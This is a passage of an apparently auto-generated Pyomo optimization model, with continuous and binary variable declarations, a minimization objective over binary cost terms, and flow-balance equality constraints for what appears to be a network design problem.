m.x339 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x340 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x341 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x342 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x343 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x344 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x345 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x346 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x347 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x348 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x349 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x350 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x351 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x352 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x353 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x354 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x355 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x356 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x357 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x358 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x359 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x360 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x361 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x362 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x363 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x364 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x365 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x366 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x367 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x368 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x369 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x370 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x371 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x372 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x373 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x374 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x375 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x376 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x377 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x378 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x379 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x380 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x381 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x382 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x383 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x384 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x385 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x386 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x387 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x388 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x389 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x390 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x391 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x392 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x393 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x394 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x395 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x396 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x397 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x398 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x399 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x400 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x401 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x402 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x403 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x404 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x405 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x406 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x407 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x408 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x409 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x410 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x411 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x412 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x413 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x414 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x415 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x416 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x417 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x418 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x419 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x420 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x421 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x422 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x423 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x424 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x425 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x426 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x427 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x428 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x429 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x430 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x431 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x432 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x433 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x434 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x435 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x436 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x437 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x438 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x439 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x440 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x441 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x442 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x443 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x444 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x445 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x446 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x447 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x448 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x449 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x450 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x451 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x452 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x453 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x454 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x455 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x456 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x457 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x458 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x459 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x460 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x461 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x462 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x463 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x464 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x465 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x466 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x467 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x468 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x469 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x470 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x471 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x472 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x473 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x474 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x475 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x476 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x477 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x478 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x479 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x480 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x481 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x482 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x483 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x484 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x485 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x486 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x487 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x488 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x489 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x490 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x491 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x492 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x493 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x494 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x495 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x496 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x497 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x498 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x499 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x500 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x501 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x502 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x503 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x504 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x505 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x506 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x507 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x508 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x509 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x510 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x511 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x512 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x513 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x514 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x515 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x516 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x517 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x518 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x519 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x520 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x521 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x522 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x523 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x524 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x525 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x526 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x527 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x528 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x529 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x530 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x531 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x532 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x533 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x534 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x535 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x536 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x537 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x538 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x539 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x540 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x541 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x542 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x543 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x544 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x545 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x546 = Var(within=Reals,bounds=(0,None),initialize=0)
m.b547 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b548 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b549 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b550 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b551 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b552 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b553 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b554 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b555 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b556 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b557 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b558 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b559 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b560 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b561 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b562 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b563 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b564 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b565 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b566 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b567 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b568 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b569 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b570 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b571 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b572 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b573 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b574 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b575 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b576 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b577 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b578 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b579 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b580 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b581 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b582 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b583 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b584 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b585 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b586 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b587 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b588 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x589 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x590 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x591 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x592 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x593 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x594 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x595 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x596 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x597 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x598 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x599 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x600 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x601 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x602 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x603 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x604 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x605 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x606 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x607 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x608 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x609 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x610 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x611 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x612 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x613 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x614 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x615 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x616 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x617 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x618 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x619 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x620 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x621 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x622 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x623 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x624 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x625 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x626 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x627 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x628 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x629 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x630 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x632 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x633 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x634 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x635 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x636 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x637 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x638 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x639 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x640 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x641 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x642 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x643 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x644 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x645 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x646 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x647 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x648 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x649 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x650 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x651 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x652 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x653 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x654 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x655 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x656 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x657 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x658 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x659 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x660 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x661 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x662 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x663 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x664 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x665 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x666 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x667 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x668 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x669 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x670 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x671 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x672 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x673 = Var(within=Reals,bounds=(0,None),initialize=0)
m.obj = Objective(expr= 1.090016011*m.b547 + 3.10674202*m.b548 + 2.475702586*m.b549 + 1.966733944*m.b550
+ 1.090016011*m.b551 + 2.019536713*m.b552 + 3.10674202*m.b553 + 1.383540955*m.b554
+ 2.087059045*m.b555 + 3.720443668*m.b556 + 1.383540955*m.b557 + 1.794144217*m.b558
+ 3.50653318*m.b559 + 1.71812596*m.b560 + 3.834780538*m.b561 + 2.087059045*m.b562
+ 1.794144217*m.b563 + 2.239621249*m.b564 + 2.475702586*m.b565 + 2.019536713*m.b566
+ 3.720443668*m.b567 + 3.50653318*m.b568 + 2.239621249*m.b569 + 1.098732406*m.b570
+ 1.742557876*m.b571 + 1.098732406*m.b572 + 3.606882982*m.b573 + 1.71812596*m.b574
+ 2.074958698*m.b575 + 1.966733944*m.b576 + 2.074958698*m.b577 + 3.859970515*m.b578
+ 1.742557876*m.b579 + 3.859970515*m.b580 + 3.951460459*m.b581 + 3.834780538*m.b582
+ 3.606882982*m.b583 + 2.524064089*m.b584 + 2.524064089*m.b585 + 3.982701487*m.b586
+ 3.951460459*m.b587 + 3.982701487*m.b588, sense=minimize)
m.c2 = Constraint(expr= - m.x1 - m.x14 - m.x27 - m.x40 + m.x53 + m.x79 + m.x235 + m.x378 == -148)
m.c3 = Constraint(expr= - m.x2 - m.x15 - m.x28 - m.x41 + m.x54 + m.x80 + m.x236 + m.x379 == 12)
m.c4 = Constraint(expr= - m.x3 - m.x16 - m.x29 - m.x42 + m.x55 + m.x81 + m.x237 + m.x380 == 16)
m.c5 = Constraint(expr= - m.x4 - m.x17 - m.x30 - m.x43 + m.x56 + m.x82 + m.x238 + m.x381 == 21)
m.c6 = Constraint(expr= - m.x5 - m.x18 - m.x31 - m.x44 + m.x57 + m.x83 + m.x239 + m.x382 == 11)
m.c7 = Constraint(expr= - m.x6 - m.x19 - m.x32 - m.x45 + m.x58 + m.x84 + m.x240 + m.x383 == 24)
m.c8 = Constraint(expr= - m.x7 - m.x20 - m.x33 - m.x46 + m.x59 + m.x85 + m.x241 + m.x384 == 24)
m.c9 = Constraint(expr= - m.x8 - m.x21 - m.x34 - m.x47 + m.x60 + m.x86 + m.x242 + m.x385 == 8)
m.c10 = Constraint(expr= - m.x9 - m.x22 - m.x35 - m.x48 + m.x61 + m.x87 + m.x243 + m.x386 == 10)
m.c11 = Constraint(expr= - m.x10 - m.x23 - m.x36 - m.x49 + m.x62 + m.x88 + m.x244 + m.x387 == 18)
m.c12 = Constraint(expr= - m.x11 - m.x24 - m.x37 - m.x50 + m.x63 + m.x89 + m.x245 + m.x388 == 11)
m.c13 = Constraint(expr= - m.x12 - m.x25 - m.x38 - m.x51 + m.x64 + m.x90 + m.x246 + m.x389 == 20)
m.c14 = Constraint(expr= - m.x13 - m.x26 - m.x39 - m.x52 + m.x65 + m.x91 + m.x247 + m.x390 == 7)
m.c15 = Constraint(expr= m.x1 - m.x53 - m.x66 + m.x248 == 7)
m.c16 = Constraint(expr= m.x2 - m.x54 - m.x67 + m.x249 == -175)
m.c17 = Constraint(expr= m.x3 - m.x55 - m.x68 + m.x250 == 15)
m.c18 = Constraint(expr= m.x4 - m.x56 - m.x69 + m.x251 == 17)
m.c19 = Constraint(expr= m.x5 - m.x57 - m.x70 + m.x252 == 20)
m.c20 = Constraint(expr= m.x6 - m.x58 - m.x71 + m.x253 == 24)
m.c21 = Constraint(expr= m.x7 - m.x59 - m.x72 + m.x254 == 6)
m.c22 = Constraint(expr= m.x8 - m.x60 - m.x73 + m.x255 == 19)
m.c23 = Constraint(expr= m.x9 - m.x61 - m.x74 + m.x256 == 24)
m.c24 = Constraint(expr= m.x10 - m.x62 - m.x75 + m.x257 == 11)
m.c25 = Constraint(expr= m.x11 - m.x63 - m.x76 + m.x258 == 15)
m.c26 = Constraint(expr= m.x12 - m.x64 - m.x77 + m.x259 == 9)
m.c27 = Constraint(expr= m.x13 - m.x65 - m.x78 + m.x260 == 19)
m.c28 = Constraint(expr= m.x14 - m.x79 - m.x92 - m.x105 - m.x118 + m.x131 + m.x196 + m.x261 == 15)
m.c29 = Constraint(expr= m.x15 - m.x80 - m.x93 - m.x106 - m.x119 + m.x132 + m.x197 + m.x262 == 13)
m.c30 = Constraint(expr= m.x16 - m.x81 - m.x94 - m.x107 - m.x120 + m.x133 + m.x198 + m.x263 == -231)
m.c31 = Constraint(expr= m.x17 - m.x82 - m.x95 - m.x108 - m.x121 + m.x134 + m.x199 + m.x264 == 23)
m.c32 = Constraint(expr= m.x18 - m.x83 - m.x96 - m.x109 - m.x122 + m.x135 + m.x200 + m.x265 == 18)
m.c33 = Constraint(expr= m.x19 - m.x84 - m.x97 - m.x110 - m.x123 + m.x136 + m.x201 + m.x266 == 19)
m.c34 = Constraint(expr= m.x20 - m.x85 - m.x98 - m.x111 - m.x124 + m.x137 + m.x202 + m.x267 == 9)
m.c35 = Constraint(expr= m.x21 - m.x86 - m.x99 - m.x112 - m.x125 + m.x138 + m.x203 + m.x268 == 8)
m.c36 = Constraint(expr= m.x22 - m.x87 - m.x100 - m.x113 - m.x126 + m.x139 + m.x204 + m.x269 == 16)
m.c37 = Constraint(expr= m.x23 - m.x88 - m.x101 - m.x114 - m.x127 + m.x140 + m.x205 + m.x270 == 19)
m.c38 = Constraint(expr= m.x24 - m.x89 - m.x102 - m.x115 - m.x128 + m.x141 + m.x206 + m.x271 == 19)
m.c39 = Constraint(expr= m.x25 - m.x90 - m.x103 - m.x116 - m.x129 + m.x142 + m.x207 + m.x272 == 21)
m.c40 = Constraint(expr= m.x26 - m.x91 - m.x104 - m.x117 - m.x130 + m.x143 + m.x208 + m.x273 == 8)
m.c41 = Constraint(expr= m.x92 - m.x131 - m.x144 - m.x157 - m.x170 - m.x183 + m.x209 + m.x274 + m.x352 + m.x456 == 12)
m.c42 = Constraint(expr= m.x93 - m.x132 - m.x145 - m.x158 - m.x171 - m.x184 + m.x210 + m.x275 + m.x353 + m.x457 == 20)
m.c43 = Constraint(expr= m.x94 - m.x133 - m.x146 - m.x159 - m.x172 - m.x185 + m.x211 + m.x276 + m.x354 + m.x458 == 23)
m.c44 = Constraint(expr= m.x95 - m.x134 - m.x147 - m.x160 - m.x173 - m.x186 + m.x212 + m.x277 + m.x355 + m.x459
== -187)
m.c45 = Constraint(expr= m.x96 - m.x135 - m.x148 - m.x161 - m.x174 - m.x187 + m.x213 + m.x278 + m.x356 + m.x460 == 21)
m.c46 = Constraint(expr= m.x97 - m.x136 - m.x149 - m.x162 - m.x175 - m.x188 + m.x214 + m.x279 + m.x357 + m.x461 == 12)
m.c47 = Constraint(expr= m.x98 - m.x137 - m.x150 - m.x163 - m.x176 - m.x189 + m.x215 + m.x280 + m.x358 + m.x462 == 6)
m.c48 = Constraint(expr= m.x99 - m.x138 - m.x151 - m.x164 - m.x177 - m.x190 + m.x216 + m.x281 + m.x359 + m.x463 == 11)
m.c49 = Constraint(expr= m.x100 - m.x139 - m.x152 - m.x165 - m.x178 - m.x191 + m.x217 + m.x282 + m.x360 + m.x464
== 19)
m.c50 = Constraint(expr= m.x101 - m.x140 - m.x153 - m.x166 - m.x179 - m.x192 + m.x218 + m.x283 + m.x361 + m.x465 == 9)
m.c51 = Constraint(expr= m.x102 - m.x141 - m.x154 - m.x167 - m.x180 - m.x193 + m.x219 + m.x284 + m.x362 + m.x466
== 17)
m.c52 = Constraint(expr= m.x103 - m.x142 - m.x155 - m.x168 - m.x181 - m.x194 + m.x220 + m.x285 + m.x363 + m.x467
== 23)
m.c53 = Constraint(expr= m.x104 - m.x143 - m.x156 - m.x169 - m.x182 - m.x195 + m.x221 + m.x286 + m.x364 + m.x468
== 21)
m.c54 = Constraint(expr= m.x105 + m.x144 - m.x196 - m.x209 - m.x222 + m.x287 == 14)
m.c55 = Constraint(expr= m.x106 + m.x145 - m.x197 - m.x210 - m.x223 + m.x288 == 7)
m.c56 = Constraint(expr= m.x107 + m.x146 - m.x198 - m.x211 - m.x224 + m.x289 == 22)
m.c57 = Constraint(expr= m.x108 + m.x147 - m.x199 - m.x212 - m.x225 + m.x290 == 14)
m.c58 = Constraint(expr= m.x109 + m.x148 - m.x200 - m.x213 - m.x226 + m.x291 == -170)
m.c59 = Constraint(expr= m.x110 + m.x149 - m.x201 - m.x214 - m.x227 + m.x292 == 12)
m.c60 = Constraint(expr= m.x111 + m.x150 - m.x202 - m.x215 - m.x228 + m.x293 == 13)
m.c61 = Constraint(expr= m.x112 + m.x151 - m.x203 - m.x216 - m.x229 + m.x294 == 10)
m.c62 = Constraint(expr= m.x113 + m.x152 - m.x204 - m.x217 - m.x230 + m.x295 == 15)
m.c63 = Constraint(expr= m.x114 + m.x153 - m.x205 - m.x218 - m.x231 + m.x296 == 9)
m.c64 = Constraint(expr= m.x115 + m.x154 - m.x206 - m.x219 - m.x232 + m.x297 == 14)
m.c65 = Constraint(expr= m.x116 + m.x155 - m.x207 - m.x220 - m.x233 + m.x298 == 16)
m.c66 = Constraint(expr= m.x117 + m.x156 - m.x208 - m.x221 - m.x234 + m.x299 == 8)
m.c67 = Constraint(expr= m.x27 + m.x66 + m.x118 + m.x157 + m.x222 - m.x235 - m.x248 - m.x261 - m.x274 - m.x287
